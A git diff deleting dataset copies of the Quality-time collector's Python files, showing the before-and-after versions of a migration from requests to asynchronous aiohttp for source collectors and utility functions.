a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.source.py +++ /dev/null @@ -1,231 +0,0 @@ -"""Source collector base classes.""" - -import io -import logging -import traceback -import urllib -import zipfile -from abc import ABC, abstractmethod -from datetime import datetime -from http import HTTPStatus -from typing import cast, Dict, Final, List, Optional, Set, Tuple, Type, Union - -import requests - -from collector_utilities.functions import days_ago, tokenless, stable_traceback -from collector_utilities.type import ErrorMessage, Entities, Measurement, Response, Responses, URL, Value - - -class SourceCollector(ABC): - """Base class for source collectors. Source collectors are subclasses of this class that know how to collect the - measurement data for one specific metric from one specific source.""" - - TIMEOUT = 10 # Default timeout of 10 seconds - MAX_ENTITIES = 100 # The maximum number of entities (e.g. violations, warnings) to send to the server - API_URL_PARAMETER_KEY = "url" - source_type = "" # The source type is set on the subclass, when the subclass is registered - subclasses: Set[Type["SourceCollector"]] = set() - - def __init__(self, source, datamodel) -> None: - self._datamodel: Final = datamodel - self.__parameters: Final[Dict[str, Union[str, List[str]]]] = source.get("parameters", {}) - - def __init_subclass__(cls) -> None: - SourceCollector.subclasses.add(cls) - super().__init_subclass__() - - @classmethod - def get_subclass(cls, source_type: str, metric_type: str) -> Type["SourceCollector"]: - """Return the subclass registered for the source/metric name. First try to find a match on both source type - and metric type. If no match is found, return the generic collector for the source type.""" - for class_name in (f"{source_type}{metric_type}", source_type): - matching_subclasses = [sc for sc in cls.subclasses if sc.__name__.lower() == class_name.replace("_", "")] - if matching_subclasses: - matching_subclasses[0].source_type = source_type - return matching_subclasses[0] - raise LookupError(f"Couldn't find collector subclass for source {source_type} and metric {metric_type}") - - def get(self) -> Measurement: - """Return the measurement from this source.""" - responses, api_url, connection_error = self.__safely_get_source_responses() - value, total, entities, parse_error = self.__safely_parse_source_responses(responses) - landing_url = self._landing_url(responses) - return dict(api_url=api_url, landing_url=landing_url, value=value, total=total, entities=entities, - connection_error=connection_error, parse_error=parse_error) - - def _landing_url(self, responses: Responses) -> URL: # pylint: disable=unused-argument - """Return the user supplied landing url parameter if there is one, otherwise translate the url parameter into - a default landing url.""" - if landing_url := cast(str, self.__parameters.get("landing_url", "")).rstrip("/"): - return URL(landing_url) - url = cast(str, self.__parameters.get(self.API_URL_PARAMETER_KEY, "")).rstrip("/") - return URL(url[:-(len("xml"))] + "html" if url.endswith(".xml") else url) - - def _api_url(self) -> URL: - """Translate the url parameter into the API url.""" - return URL(cast(str, self.__parameters.get(self.API_URL_PARAMETER_KEY, "")).rstrip("/")) - - def _parameter(self, parameter_key: str, quote: bool = False) -> Union[str, List[str]]: - """Return the parameter value.""" - - def quote_if_needed(parameter_value): - """Quote the string if needed.""" - return 
urllib.parse.quote(parameter_value, safe="") if quote else parameter_value - - parameter_info = self._datamodel["sources"][self.source_type]["parameters"][parameter_key] - if "values" in parameter_info and parameter_info["type"].startswith("multiple_choice"): - value = self.__parameters.get(parameter_key) or parameter_info["values"] - else: - default_value = parameter_info.get("default_value", "") - value = self.__parameters.get(parameter_key, default_value) - if api_values := parameter_info.get("api_values"): - value = api_values.get(value, value) if isinstance(value, str) else [api_values.get(v, v) for v in value] - if parameter_key.endswith("url"): - value = cast(str, value).rstrip("/") - return quote_if_needed(value) if isinstance(value, str) else [quote_if_needed(v) for v in value] - - def __safely_get_source_responses(self) -> Tuple[Responses, URL, ErrorMessage]: - """Connect to the source and get the data, without failing. This method should not be overridden - because it makes sure the collection of source data never causes the collector to fail.""" - responses: Responses = [] - api_url = URL("") - error = None - try: - responses = self._get_source_responses(api_url := self._api_url()) - for response in responses: - response.raise_for_status() - logging.info("Retrieved %s", tokenless(api_url) or self.__class__.__name__) - except Exception as reason: # pylint: disable=broad-except - error = stable_traceback(traceback.format_exc()) - logging.warning("Failed to retrieve %s: %s", tokenless(api_url) or self.__class__.__name__, reason) - return responses, api_url, error - - def _get_source_responses(self, api_url: URL) -> Responses: - """Open the url. Can be overridden if a post request is needed or multiple requests need to be made.""" - return [ - requests.get(api_url, timeout=self.TIMEOUT, auth=self._basic_auth_credentials(), headers=self._headers())] - - def _headers(self) -> Dict[str, str]: # pylint: disable=no-self-use - """Return the headers for the request.""" - return dict() - - def _basic_auth_credentials(self) -> Optional[Tuple[str, str]]: - """Return the basic authentication credentials, if any.""" - if token := cast(str, self.__parameters.get("private_token", "")): - return token, "" - username = cast(str, self.__parameters.get("username", "")) - password = cast(str, self.__parameters.get("password", "")) - return (username, password) if username and password else None - - def __safely_parse_source_responses( - self, responses: Responses) -> Tuple[Value, Value, Entities, ErrorMessage]: - """Parse the data from the responses, without failing. This method should not be overridden because it - makes sure that the parsing of source data never causes the collector to fail.""" - entities: Entities = [] - value, total, error = None, None, None - if responses: - try: - value, total, entities = self._parse_source_responses(responses) - except Exception: # pylint: disable=broad-except - error = stable_traceback(traceback.format_exc()) - return value, total, entities[:self.MAX_ENTITIES], error - - def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - """Parse the responses to get the measurement value, the total value, and the entities for the metric. 
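
The _parameter logic above resolves multiple-choice values and maps them through api_values. A small sketch of those resolution rules against an invented datamodel fragment (the real one lives in the server component):

parameter_info = {
    "type": "multiple_choice",
    "values": ["errors", "warnings"],
    "api_values": {"errors": "ERROR", "warnings": "WARN"},
}
configured = {"severities": ["warnings"]}

# Multiple-choice: fall back to all allowed values when nothing is configured.
value = configured.get("severities") or parameter_info["values"]
# Translate UI values to API values, keeping unknown entries as-is.
if api_values := parameter_info.get("api_values"):
    value = [api_values.get(v, v) for v in value]
print(value)  # ['WARN']
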
- This method can be overridden by collectors to parse the retrieved sources data.""" - # pylint: disable=assignment-from-none,no-self-use,unused-argument - return None, "100", [] # pragma nocover - - -class FileSourceCollector(SourceCollector, ABC): # pylint: disable=abstract-method - """Base class for source collectors that retrieve files.""" - - file_extensions: List[str] = [] # Subclass responsibility - - def _get_source_responses(self, api_url: URL) -> Responses: - responses = super()._get_source_responses(api_url) - if not api_url.endswith(".zip"): - return responses - unzipped_responses = [] - for response in responses: - unzipped_responses.extend(self.__unzip(response)) - return unzipped_responses - - def _headers(self) -> Dict[str, str]: - headers = super()._headers() - if token := cast(str, self._parameter("private_token")): - # GitLab needs this header, see - # https://docs.gitlab.com/ee/api/jobs.html#download-a-single-artifact-file-by-job-id - headers["Private-Token"] = token - return headers - - @classmethod - def __unzip(cls, response: Response) -> Responses: - """Unzip the response content and return a (new) response for each applicable file in the zip archive.""" - responses = [] - with zipfile.ZipFile(io.BytesIO(response.content)) as response_zipfile: - names = [name for name in response_zipfile.namelist() if name.split(".")[-1].lower() in cls.file_extensions] - for name in names: - unzipped_response = requests.Response() - unzipped_response.raw = io.BytesIO(response_zipfile.read(name)) - unzipped_response.status_code = HTTPStatus.OK - responses.append(unzipped_response) - return responses - - -class HTMLFileSourceCollector(FileSourceCollector, ABC): # pylint: disable=abstract-method - """Base class for source collectors that retrieve HTML files.""" - - file_extensions = ["html", "htm"] - - -class JSONFileSourceCollector(FileSourceCollector, ABC): # pylint: disable=abstract-method - """Base class for source collectors that retrieve JSON files.""" - - file_extensions = ["json"] - - -class XMLFileSourceCollector(FileSourceCollector, ABC): # pylint: disable=abstract-method - """Base class for source collectors that retrieve XML files.""" - - file_extensions = ["xml"] - - -class LocalSourceCollector(SourceCollector, ABC): # pylint: disable=abstract-method - """Base class for source collectors that do not need to access the network but return static or user-supplied - data.""" - - def _get_source_responses(self, api_url: URL) -> Responses: - fake_response = requests.Response() - fake_response.status_code = HTTPStatus.OK - return [fake_response] # Return a fake response so that the parse methods will be called - - -class UnmergedBranchesSourceCollector(SourceCollector, ABC): # pylint: disable=abstract-method - """Base class for unmerged branches source collectors.""" - - def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - entities = [ - dict(key=branch["name"], name=branch["name"], commit_age=str(days_ago(self._commit_datetime(branch))), - commit_date=str(self._commit_datetime(branch).date())) - for branch in self._unmerged_branches(responses)] - return str(len(entities)), "100", entities - - @abstractmethod - def _unmerged_branches(self, responses: Responses) -> List: - """Return the list of unmerged branch.""" - - @abstractmethod - def _commit_datetime(self, branch) -> datetime: - """Return the date and time of the last commit on the branch.""" - - -class SourceUpToDatenessCollector(SourceCollector): - """Base class for source 
up-to-dateness collectors.""" - - def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - return str(days_ago(min(self._parse_source_response_date_time(response) for response in responses))), "100", [] - - def _parse_source_response_date_time(self, response: Response) -> datetime: - """Parse the date time from the source.""" - raise NotImplementedError # pragma: nocover diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.target.py b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.target.py deleted file mode 100644 index 339ec3a..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.target.py +++ /dev/null @@ -1,205 +0,0 @@ -"""Source collector base classes.""" - -import asyncio -import json -import logging -import traceback -import urllib -from abc import ABC, abstractmethod -from datetime import datetime -from http import HTTPStatus -from typing import cast, Any, Dict, Final, List, Optional, Set, Tuple, Type, Union - -import aiohttp - -from collector_utilities.functions import days_ago, tokenless, stable_traceback -from collector_utilities.type import ErrorMessage, Entities, JSON, Measurement, Response, Responses, URL, Value - - -class SourceCollector(ABC): - """Base class for source collectors. Source collectors are subclasses of this class that know how to collect the - measurement data for one specific metric from one specific source.""" - - MAX_ENTITIES = 100 # The maximum number of entities (e.g. violations, warnings) to send to the server - API_URL_PARAMETER_KEY = "url" - source_type = "" # The source type is set on the subclass, when the subclass is registered - subclasses: Set[Type["SourceCollector"]] = set() - - def __init__(self, session: aiohttp.ClientSession, source, datamodel) -> None: - self._session = session - self._datamodel: Final = datamodel - self.__parameters: Final[Dict[str, Union[str, List[str]]]] = source.get("parameters", {}) - - def __init_subclass__(cls) -> None: - SourceCollector.subclasses.add(cls) - super().__init_subclass__() - - @classmethod - def get_subclass(cls, source_type: str, metric_type: str) -> Type["SourceCollector"]: - """Return the subclass registered for the source/metric name. First try to find a match on both source type - and metric type. 
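
The lookup described above relies on __init_subclass__ filling a registry that get_subclass then searches by lower-cased class name. A condensed, runnable sketch with invented collector classes:

from typing import Set, Type


class SourceCollector:
    subclasses: Set[Type["SourceCollector"]] = set()

    def __init_subclass__(cls) -> None:
        SourceCollector.subclasses.add(cls)
        super().__init_subclass__()

    @classmethod
    def get_subclass(cls, source_type: str, metric_type: str) -> Type["SourceCollector"]:
        # Prefer a source+metric specific collector, fall back to the source type.
        for class_name in (f"{source_type}{metric_type}", source_type):
            matches = [sc for sc in cls.subclasses if sc.__name__.lower() == class_name.replace("_", "")]
            if matches:
                return matches[0]
        raise LookupError(f"No collector for {source_type}/{metric_type}")


class AzureDevopsIssues(SourceCollector):
    pass


class AzureDevops(SourceCollector):
    pass


assert SourceCollector.get_subclass("azure_devops", "issues") is AzureDevopsIssues
assert SourceCollector.get_subclass("azure_devops", "tests") is AzureDevops
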
If no match is found, return the generic collector for the source type.""" - for class_name in (f"{source_type}{metric_type}", source_type): - matching_subclasses = [sc for sc in cls.subclasses if sc.__name__.lower() == class_name.replace("_", "")] - if matching_subclasses: - matching_subclasses[0].source_type = source_type - return matching_subclasses[0] - raise LookupError(f"Couldn't find collector subclass for source {source_type} and metric {metric_type}") - - async def get(self) -> Measurement: - """Return the measurement from this source.""" - responses, api_url, connection_error = await self.__safely_get_source_responses() - value, total, entities, parse_error = await self.__safely_parse_source_responses(responses) - landing_url = await self.__safely_parse_landing_url(responses) - return dict(api_url=api_url, landing_url=landing_url, value=value, total=total, entities=entities, - connection_error=connection_error, parse_error=parse_error) - - async def _api_url(self) -> URL: - """Translate the url parameter into the API url.""" - return URL(cast(str, self.__parameters.get(self.API_URL_PARAMETER_KEY, "")).rstrip("/")) - - def _parameter(self, parameter_key: str, quote: bool = False) -> Union[str, List[str]]: - """Return the parameter value.""" - - def quote_if_needed(parameter_value: str) -> str: - """Quote the string if needed.""" - return urllib.parse.quote(parameter_value, safe="") if quote else parameter_value - - parameter_info = self._datamodel["sources"][self.source_type]["parameters"][parameter_key] - if "values" in parameter_info and parameter_info["type"].startswith("multiple_choice"): - value = self.__parameters.get(parameter_key) or parameter_info["values"] - else: - default_value = parameter_info.get("default_value", "") - value = self.__parameters.get(parameter_key, default_value) - if api_values := parameter_info.get("api_values"): - value = api_values.get(value, value) if isinstance(value, str) else [api_values.get(v, v) for v in value] - if parameter_key.endswith("url"): - value = cast(str, value).rstrip("/") - return quote_if_needed(value) if isinstance(value, str) else [quote_if_needed(v) for v in value] - - async def __safely_get_source_responses(self) -> Tuple[Responses, URL, ErrorMessage]: - """Connect to the source and get the data, without failing. This method should not be overridden - because it makes sure the collection of source data never causes the collector to fail.""" - responses: Responses = [] - api_url = URL("") - error = None - try: - responses = await self._get_source_responses(api_url := await self._api_url()) - logging.info("Retrieved %s", tokenless(api_url) or self.__class__.__name__) - except Exception as reason: # pylint: disable=broad-except - error = stable_traceback(traceback.format_exc()) - logging.warning("Failed to retrieve %s: %s", tokenless(api_url) or self.__class__.__name__, reason) - return responses, api_url, error - - async def _get_source_responses(self, *urls: URL) -> Responses: - """Open the url. 
Can be overridden if a post request is needed or serial requests need to be made.""" - kwargs: Dict[str, Any] = dict() - credentials = self._basic_auth_credentials() - if credentials is not None: - kwargs["auth"] = aiohttp.BasicAuth(credentials[0], credentials[1]) - if headers := self._headers(): - kwargs["headers"] = headers - tasks = [self._session.get(url, **kwargs) for url in urls] - return list(await asyncio.gather(*tasks)) - - def _basic_auth_credentials(self) -> Optional[Tuple[str, str]]: - """Return the basic authentication credentials, if any.""" - if token := cast(str, self.__parameters.get("private_token", "")): - return token, "" - username = cast(str, self.__parameters.get("username", "")) - password = cast(str, self.__parameters.get("password", "")) - return (username, password) if username and password else None - - def _headers(self) -> Dict[str, str]: # pylint: disable=no-self-use - """Return the headers for the get request.""" - return {} - - async def __safely_parse_source_responses( - self, responses: Responses) -> Tuple[Value, Value, Entities, ErrorMessage]: - """Parse the data from the responses, without failing. This method should not be overridden because it - makes sure that the parsing of source data never causes the collector to fail.""" - entities: Entities = [] - value, total, error = None, None, None - if responses: - try: - value, total, entities = await self._parse_source_responses(responses) - except Exception: # pylint: disable=broad-except - error = stable_traceback(traceback.format_exc()) - return value, total, entities[:self.MAX_ENTITIES], error - - async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - """Parse the responses to get the measurement value, the total value, and the entities for the metric. - This method can be overridden by collectors to parse the retrieved sources data.""" - # pylint: disable=assignment-from-none,no-self-use,unused-argument - return None, "100", [] # pragma nocover - - async def __safely_parse_landing_url(self, responses: Responses) -> URL: - """Parse the responses to get the landing url, without failing. This method should not be overridden because - it makes sure that the parsing of source data never causes the collector to fail.""" - try: - return await self._landing_url(responses) - except Exception: # pylint: disable=broad-except - return await self._api_url() - - async def _landing_url(self, responses: Responses) -> URL: # pylint: disable=unused-argument - """Return the user supplied landing url parameter if there is one, otherwise translate the url parameter into - a default landing url.""" - if landing_url := cast(str, self.__parameters.get("landing_url", "")).rstrip("/"): - return URL(landing_url) - url = cast(str, self.__parameters.get(self.API_URL_PARAMETER_KEY, "")).rstrip("/") - return URL(url[:-(len("xml"))] + "html" if url.endswith(".xml") else url) - - -class FakeResponse: # pylint: disable=too-few-public-methods - """Fake a response because aiohttp.ClientResponse can not easily be instantiated directly. 
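
The functions.py hunk further below turns parse_source_response_xml into a coroutine that awaits response.text(). A sketch of that change against a stub response (defusedxml must be installed; the XML payload is invented):

import asyncio

from defusedxml import ElementTree


class StubResponse:
    # Minimal awaitable-text response, enough for the parser.
    async def text(self) -> str:
        return "<testsuite tests='2'></testsuite>"


async def parse_source_response_xml(response):
    # Awaiting text() is the essential difference from the requests version.
    return ElementTree.fromstring(await response.text())


tree = asyncio.run(parse_source_response_xml(StubResponse()))
print(tree.tag, tree.get("tests"))  # testsuite 2
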
""" - status = HTTPStatus.OK - - def __init__(self, contents: bytes = bytes()) -> None: - super().__init__() - self.contents = contents - - async def json(self) -> JSON: - """Return the JSON version of the contents.""" - return cast(JSON, json.loads(self.contents)) - - async def text(self) -> str: - """Return the text version of the contents.""" - return str(self.contents.decode()) - - -class LocalSourceCollector(SourceCollector, ABC): # pylint: disable=abstract-method - """Base class for source collectors that do not need to access the network but return static or user-supplied - data.""" - - async def _get_source_responses(self, *urls: URL) -> Responses: - return [cast(Response, FakeResponse())] # Return a fake response so that the parse methods will be called - - -class UnmergedBranchesSourceCollector(SourceCollector, ABC): # pylint: disable=abstract-method - """Base class for unmerged branches source collectors.""" - - async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - entities = [ - dict(key=branch["name"], name=branch["name"], commit_age=str(days_ago(self._commit_datetime(branch))), - commit_date=str(self._commit_datetime(branch).date())) - for branch in await self._unmerged_branches(responses)] - return str(len(entities)), "100", entities - - @abstractmethod - async def _unmerged_branches(self, responses: Responses) -> List[Dict[str, Any]]: - """Return the list of unmerged branches.""" - - @abstractmethod - def _commit_datetime(self, branch) -> datetime: - """Return the date and time of the last commit on the branch.""" - - -class SourceUpToDatenessCollector(SourceCollector): - """Base class for source up-to-dateness collectors.""" - - async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - date_times = await asyncio.gather(*[self._parse_source_response_date_time(response) for response in responses]) - return str(days_ago(min(date_times))), "100", [] - - async def _parse_source_response_date_time(self, response: Response) -> datetime: - """Parse the date time from the source.""" - raise NotImplementedError # pragma: nocover diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.diff b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.diff deleted file mode 100644 index 1816644..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.diff +++ /dev/null @@ -1,67 +0,0 @@ -diff --git a/components/collector/src/collector_utilities/functions.py b/components/collector/src/collector_utilities/functions.py - index 6df08864df270b6956cc78502aa3d9c0446038d5..d3a9a16a72348cece48c9788cf10db6cc043ec7c 100644 - --- a/components/collector/src/collector_utilities/functions.py - +++ b/components/collector/src/collector_utilities/functions.py -@@ -4,8 +4,8 @@ import contextlib - import hashlib - import re - import urllib --from datetime import datetime, timedelta --from typing import cast, Collection, Pattern, Tuple -+from datetime import datetime -+from typing import cast, Collection, Generator, Pattern, Tuple - from xml.etree.ElementTree import Element # nosec, Element is not available from defusedxml, but only used as type - - from defusedxml import ElementTree -@@ -13,24 +13,24 @@ from defusedxml import ElementTree - from .type import Namespaces, Response, URL - - --def parse_source_response_xml(response: Response, allowed_root_tags: 
Collection[str] = None) -> Element: -+async def parse_source_response_xml(response: Response, allowed_root_tags: Collection[str] = None) -> Element: - """Parse the XML from the source response.""" -- tree = cast(Element, ElementTree.fromstring(response.text)) -+ tree = cast(Element, ElementTree.fromstring(await response.text())) - if allowed_root_tags and tree.tag not in allowed_root_tags: - raise AssertionError(f'The XML root element should be one of "{allowed_root_tags}" but is "{tree.tag}"') - return tree - - --def parse_source_response_xml_with_namespace( -+async def parse_source_response_xml_with_namespace( - response: Response, allowed_root_tags: Collection[str] = None) -> Tuple[Element, Namespaces]: - """Parse the XML with namespace from the source response.""" -- tree = parse_source_response_xml(response, allowed_root_tags) -+ tree = await parse_source_response_xml(response, allowed_root_tags) - # ElementTree has no API to get the namespace so we extract it from the root tag: - namespaces = dict(ns=tree.tag.split('}')[0][1:]) - return tree, namespaces - - --Substitution = Tuple[Pattern, str] -+Substitution = Tuple[Pattern[str], str] - MEMORY_ADDRESS_SUB: Substitution = (re.compile(r" at 0x[0-9abcdef]+>"), ">") - TOKEN_SUB: Substitution = (re.compile(r"token=[0-9a-zA-Z]+"), "token=") - KEY_SUB: Substitution = (re.compile(r"key=[0-9abcdef]+"), "key=") -@@ -92,17 +92,17 @@ def match_string_or_regular_expression(string: str, strings_and_or_regular_expre - - class Clock: # pylint: disable=too-few-public-methods - """Class to keep track of time.""" -- def __init__(self): -+ def __init__(self) -> None: - self.start = datetime.now() -- self.duration = timedelta() -+ self.duration = 0.0 - -- def stop(self): -+ def stop(self) -> None: - """Stop the clock.""" - self.duration = (datetime.now() - self.start).total_seconds() - - - @contextlib.contextmanager --def timer(): -+def timer() -> Generator[Clock, None, None]: - """Timer context manager.""" - clock = Clock() - yield clock diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.source.py b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.source.py deleted file mode 100644 index a5ae4ed..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.source.py +++ /dev/null @@ -1,109 +0,0 @@ -"""Utility functions.""" - -import contextlib -import hashlib -import re -import urllib -from datetime import datetime, timedelta -from typing import cast, Collection, Pattern, Tuple -from xml.etree.ElementTree import Element # nosec, Element is not available from defusedxml, but only used as type - -from defusedxml import ElementTree - -from .type import Namespaces, Response, URL - - -def parse_source_response_xml(response: Response, allowed_root_tags: Collection[str] = None) -> Element: - """Parse the XML from the source response.""" - tree = cast(Element, ElementTree.fromstring(response.text)) - if allowed_root_tags and tree.tag not in allowed_root_tags: - raise AssertionError(f'The XML root element should be one of "{allowed_root_tags}" but is "{tree.tag}"') - return tree - - -def parse_source_response_xml_with_namespace( - response: Response, allowed_root_tags: Collection[str] = None) -> Tuple[Element, Namespaces]: - """Parse the XML with namespace from the source response.""" - tree = parse_source_response_xml(response, allowed_root_tags) - # ElementTree has no API to get the 
namespace so we extract it from the root tag: - namespaces = dict(ns=tree.tag.split('}')[0][1:]) - return tree, namespaces - - -Substitution = Tuple[Pattern, str] -MEMORY_ADDRESS_SUB: Substitution = (re.compile(r" at 0x[0-9abcdef]+>"), ">") -TOKEN_SUB: Substitution = (re.compile(r"token=[0-9a-zA-Z]+"), "token=") -KEY_SUB: Substitution = (re.compile(r"key=[0-9abcdef]+"), "key=") -HASH_SUB: Substitution = (re.compile(r"(?i)[a-f0-9]{20,}"), "hashremoved") - - -def stable_traceback(traceback: str) -> str: - """Remove memory addresses from the traceback so make it easier to compare tracebacks.""" - for reg_exp, replacement in [MEMORY_ADDRESS_SUB, TOKEN_SUB, KEY_SUB]: - traceback = re.sub(reg_exp, replacement, traceback) - return traceback - - -def tokenless(url: URL) -> URL: - """Strip private tokens from the url.""" - return URL(re.sub(TOKEN_SUB[0], TOKEN_SUB[1], url)) - - -def hashless(url: URL) -> URL: - """Strip hashes from the url so that it can be used as part of a issue key.""" - scheme, netloc, path, query, fragment = urllib.parse.urlsplit(str(url)) - path = re.sub(HASH_SUB[0], HASH_SUB[1], path) - query = re.sub(HASH_SUB[0], HASH_SUB[1], query) - fragment = re.sub(HASH_SUB[0], HASH_SUB[1], fragment) - return URL(urllib.parse.urlunsplit((scheme, netloc, path, query, fragment))) - - -def md5_hash(string: str) -> str: - """Return a md5 hash of the string.""" - return hashlib.md5(string.encode("utf-8")).hexdigest() # nosec, Not used for cryptography - - -def sha1_hash(string: str) -> str: - """Return a sha1 hash of the string.""" - return hashlib.sha1(string.encode("utf-8")).hexdigest() # nosec, Not used for cryptography - - -def days_ago(date_time: datetime) -> int: - """Return the days since the date/time.""" - return (datetime.now(tz=date_time.tzinfo) - date_time).days - - -def is_regexp(string: str) -> bool: - """Return whether the string looks like a regular expression.""" - return bool(set("$^?.+*[]") & set(string)) - - -def match_string_or_regular_expression(string: str, strings_and_or_regular_expressions: Collection[str]) -> bool: - """Return whether the string is equal to one of the strings or matches one of the regular expressions.""" - for string_or_regular_expression in strings_and_or_regular_expressions: - if is_regexp(string_or_regular_expression): - if re.match(string_or_regular_expression, string): - return True - else: - if string_or_regular_expression == string: - return True - return False - - -class Clock: # pylint: disable=too-few-public-methods - """Class to keep track of time.""" - def __init__(self): - self.start = datetime.now() - self.duration = timedelta() - - def stop(self): - """Stop the clock.""" - self.duration = (datetime.now() - self.start).total_seconds() - - -@contextlib.contextmanager -def timer(): - """Timer context manager.""" - clock = Clock() - yield clock - clock.stop() diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.target.py b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.target.py deleted file mode 100644 index 08bf8a1..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.target.py +++ /dev/null @@ -1,109 +0,0 @@ -"""Utility functions.""" - -import contextlib -import hashlib -import re -import urllib -from datetime import datetime -from typing import cast, Collection, Generator, Pattern, Tuple -from xml.etree.ElementTree import Element # nosec, Element is not 
available from defusedxml, but only used as type - -from defusedxml import ElementTree - -from .type import Namespaces, Response, URL - - -async def parse_source_response_xml(response: Response, allowed_root_tags: Collection[str] = None) -> Element: - """Parse the XML from the source response.""" - tree = cast(Element, ElementTree.fromstring(await response.text())) - if allowed_root_tags and tree.tag not in allowed_root_tags: - raise AssertionError(f'The XML root element should be one of "{allowed_root_tags}" but is "{tree.tag}"') - return tree - - -async def parse_source_response_xml_with_namespace( - response: Response, allowed_root_tags: Collection[str] = None) -> Tuple[Element, Namespaces]: - """Parse the XML with namespace from the source response.""" - tree = await parse_source_response_xml(response, allowed_root_tags) - # ElementTree has no API to get the namespace so we extract it from the root tag: - namespaces = dict(ns=tree.tag.split('}')[0][1:]) - return tree, namespaces - - -Substitution = Tuple[Pattern[str], str] -MEMORY_ADDRESS_SUB: Substitution = (re.compile(r" at 0x[0-9abcdef]+>"), ">") -TOKEN_SUB: Substitution = (re.compile(r"token=[0-9a-zA-Z]+"), "token=") -KEY_SUB: Substitution = (re.compile(r"key=[0-9abcdef]+"), "key=") -HASH_SUB: Substitution = (re.compile(r"(?i)[a-f0-9]{20,}"), "hashremoved") - - -def stable_traceback(traceback: str) -> str: - """Remove memory addresses from the traceback so make it easier to compare tracebacks.""" - for reg_exp, replacement in [MEMORY_ADDRESS_SUB, TOKEN_SUB, KEY_SUB]: - traceback = re.sub(reg_exp, replacement, traceback) - return traceback - - -def tokenless(url: URL) -> URL: - """Strip private tokens from the url.""" - return URL(re.sub(TOKEN_SUB[0], TOKEN_SUB[1], url)) - - -def hashless(url: URL) -> URL: - """Strip hashes from the url so that it can be used as part of a issue key.""" - scheme, netloc, path, query, fragment = urllib.parse.urlsplit(str(url)) - path = re.sub(HASH_SUB[0], HASH_SUB[1], path) - query = re.sub(HASH_SUB[0], HASH_SUB[1], query) - fragment = re.sub(HASH_SUB[0], HASH_SUB[1], fragment) - return URL(urllib.parse.urlunsplit((scheme, netloc, path, query, fragment))) - - -def md5_hash(string: str) -> str: - """Return a md5 hash of the string.""" - return hashlib.md5(string.encode("utf-8")).hexdigest() # nosec, Not used for cryptography - - -def sha1_hash(string: str) -> str: - """Return a sha1 hash of the string.""" - return hashlib.sha1(string.encode("utf-8")).hexdigest() # nosec, Not used for cryptography - - -def days_ago(date_time: datetime) -> int: - """Return the days since the date/time.""" - return (datetime.now(tz=date_time.tzinfo) - date_time).days - - -def is_regexp(string: str) -> bool: - """Return whether the string looks like a regular expression.""" - return bool(set("$^?.+*[]") & set(string)) - - -def match_string_or_regular_expression(string: str, strings_and_or_regular_expressions: Collection[str]) -> bool: - """Return whether the string is equal to one of the strings or matches one of the regular expressions.""" - for string_or_regular_expression in strings_and_or_regular_expressions: - if is_regexp(string_or_regular_expression): - if re.match(string_or_regular_expression, string): - return True - else: - if string_or_regular_expression == string: - return True - return False - - -class Clock: # pylint: disable=too-few-public-methods - """Class to keep track of time.""" - def __init__(self) -> None: - self.start = datetime.now() - self.duration = 0.0 - - def stop(self) -> None: - """Stop the 
clock.""" - self.duration = (datetime.now() - self.start).total_seconds() - - -@contextlib.contextmanager -def timer() -> Generator[Clock, None, None]: - """Timer context manager.""" - clock = Clock() - yield clock - clock.stop() diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.diff b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.diff deleted file mode 100644 index 710eb55..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.diff +++ /dev/null @@ -1,23 +0,0 @@ -diff --git a/components/collector/src/collector_utilities/type.py b/components/collector/src/collector_utilities/type.py - index 6df08864df270b6956cc78502aa3d9c0446038d5..d3a9a16a72348cece48c9788cf10db6cc043ec7c 100644 - --- a/components/collector/src/collector_utilities/type.py - +++ b/components/collector/src/collector_utilities/type.py -@@ -2,7 +2,8 @@ - - from typing import Any, Dict, List, NewType, Optional, Union - --import requests -+import aiohttp -+ - - Entity = Dict[str, Union[int, float, str]] # pylint: disable=invalid-name - Entities = List[Entity] -@@ -12,7 +13,7 @@ Jobs = List[Job] - JSON = Dict[str, Any] - Namespaces = Dict[str, str] # Namespace prefix to Namespace URI mapping - Measurement = Dict[str, Any] --Response = requests.Response -+Response = aiohttp.ClientResponse - Responses = List[Response] - URL = NewType("URL", str) - Value = Optional[str] diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.source.py b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.source.py deleted file mode 100644 index f42652d..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.source.py +++ /dev/null @@ -1,18 +0,0 @@ -"""Quality-time specific types.""" - -from typing import Any, Dict, List, NewType, Optional, Union - -import requests - -Entity = Dict[str, Union[int, float, str]] # pylint: disable=invalid-name -Entities = List[Entity] -ErrorMessage = Optional[str] -Job = Dict[str, Any] -Jobs = List[Job] -JSON = Dict[str, Any] 